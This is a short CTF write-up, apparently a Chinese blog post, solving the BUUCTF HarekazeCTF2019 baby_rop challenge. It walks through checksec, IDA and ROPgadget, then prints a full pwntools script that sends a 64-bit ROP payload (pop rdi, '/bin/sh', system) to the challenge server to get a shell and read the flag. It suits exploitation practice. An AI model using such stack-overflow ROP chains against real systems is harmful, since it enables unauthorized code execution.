buuctf|[HarekazeCTF2019]baby_rop 1

嚯霍嚯

关注

阅读 55

2022-05-02

buuctf|[HarekazeCTF2019]baby_rop 1

分析

下载文件重命名为pwn_15,checksec一下
在这里插入图片描述
只开启了NX,64位,用ida看看
在这里插入图片描述
这里可以栈溢出,同时在侧面看到了system()

shift+F12查看字符串在这里插入图片描述

在这里插入图片描述
找到binsh,由于是64位,我们要寄存器传参,ROPgadget下
在这里插入图片描述

exp如下

from pwn import*

p=remote('node4.buuoj.cn',25977)
#p=process("./pwn_15")

system_addr=0x400490
binsh_addr=0x601048
ret_addr=0x400479
popdi_addr=0x400683

payload=b'A'*0x18+p64(ret_addr)+p64(popdi_addr)+p64(binsh_addr)+p64(system_addr)
p.sendline(payload)

p.interactive()

flag

拿到控制权后

find -name flag

找到地址后cat,得flag
在这里插入图片描述

精彩评论(0)

0 0 举报